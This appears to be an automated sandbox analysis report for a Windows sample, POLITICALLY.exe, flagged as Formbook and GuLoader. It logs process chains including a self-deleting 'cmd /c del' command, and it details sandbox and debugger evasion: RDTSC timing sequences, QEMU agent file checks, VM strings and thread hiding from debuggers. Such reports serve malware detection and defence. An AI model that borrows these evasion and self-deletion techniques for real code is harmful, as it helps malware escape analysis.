Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01

Source: POLITICALLY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\POLITICALLY.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\POLITICALLY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: POLITICALLY.exe	Virustotal: Detection: 17%
Source: POLITICALLY.exe	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source:	Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_00416E20 push ebx; iretd	2_2_00416E21
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_00403225 pushfd ; iretd	2_2_00403226
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DC36 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221E245 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221E378 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221E736 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DB19 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02221E17 push ds; iretd	2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DFD8 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DD81 push ecx; iretd	2_2_0221EA31
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02221DD8 push ds; iretd	2_2_02221D92
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E28D0D1 push ecx; ret	10_2_1E28D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0487D0D1 push ecx; ret	23_2_0487D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BB3B5 push eax; ret	23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B8F44 push es; ret	23_2_030B8F45
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BB40B push eax; ret	23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BB402 push eax; ret	23_2_030BB408
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BB46C push eax; ret	23_2_030BB472
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030AB48A push edx; ret	23_2_030AB48B

Source: C:\Users\user\Desktop\POLITICALLY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 0000000000578D31 second address: 0000000000578D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB47B5431h 0x0000001d popad 0x0000001e call 00007FDAB47B333Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\POLITICALLY.exe

Code function: 2_2_02213269 rdtsc

2_2_02213269

Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: POLITICALLY.exe, 0000000A.00000003.497685279.00000000008D9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\POLITICALLY.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\POLITICALLY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\POLITICALLY.exe

Code function: 2_2_02213269 rdtsc

2_2_02213269

Source: C:\Users\user\Desktop\POLITICALLY.exe

Code function: 2_2_02221066 LdrInitializeThunk,

2_2_02221066

Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02219212 mov eax, dword ptr fs:[00000030h]	2_2_02219212
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222C0B8 mov eax, dword ptr fs:[00000030h]	2_2_0222C0B8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02219102 mov eax, dword ptr fs:[00000030h]	2_2_02219102
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222C1F4 mov eax, dword ptr fs:[00000030h]	2_2_0222C1F4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222767D mov eax, dword ptr fs:[00000030h]	2_2_0222767D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_022197E8 mov eax, dword ptr fs:[00000030h]	2_2_022197E8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_022197DF mov eax, dword ptr fs:[00000030h]	2_2_022197DF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222440F mov eax, dword ptr fs:[00000030h]	2_2_0222440F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222C444 mov eax, dword ptr fs:[00000030h]	2_2_0222C444
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02217A2E mov eax, dword ptr fs:[00000030h]	2_2_02217A2E
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02219917 mov eax, dword ptr fs:[00000030h]	2_2_02219917
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222BFB8 mov eax, dword ptr fs:[00000030h]	2_2_0222BFB8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221CD2F mov eax, dword ptr fs:[00000030h]	2_2_0221CD2F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23E620 mov eax, dword ptr fs:[00000030h]	10_2_1E23E620
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]	10_2_1E2EFE3F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]	10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]	10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]	10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E268E00 mov eax, dword ptr fs:[00000030h]	10_2_1E268E00
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1608 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1608
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]	10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]	10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24766D mov eax, dword ptr fs:[00000030h]	10_2_1E24766D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]	10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]	10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]	10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]	10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]	10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]	10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]	10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]	10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]	10_2_1E2B46A7
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]	10_2_1E2CFE87
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]	10_2_1E2616E0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2476E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2476E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E278EC7 mov eax, dword ptr fs:[00000030h]	10_2_1E278EC7
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308ED6 mov eax, dword ptr fs:[00000030h]	10_2_1E308ED6
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2636CC mov eax, dword ptr fs:[00000030h]	10_2_1E2636CC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]	10_2_1E2EFEC0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]	10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]	10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26E730 mov eax, dword ptr fs:[00000030h]	10_2_1E26E730
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]	10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]	10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25F716 mov eax, dword ptr fs:[00000030h]	10_2_1E25F716
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]	10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]	10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]	10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]	10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24FF60 mov eax, dword ptr fs:[00000030h]	10_2_1E24FF60
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308F6A mov eax, dword ptr fs:[00000030h]	10_2_1E308F6A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24EF40 mov eax, dword ptr fs:[00000030h]	10_2_1E24EF40
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E248794 mov eax, dword ptr fs:[00000030h]	10_2_1E248794
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2737F5 mov eax, dword ptr fs:[00000030h]	10_2_1E2737F5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26BC2C mov eax, dword ptr fs:[00000030h]	10_2_1E26BC2C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]	10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]	10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]	10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]	10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
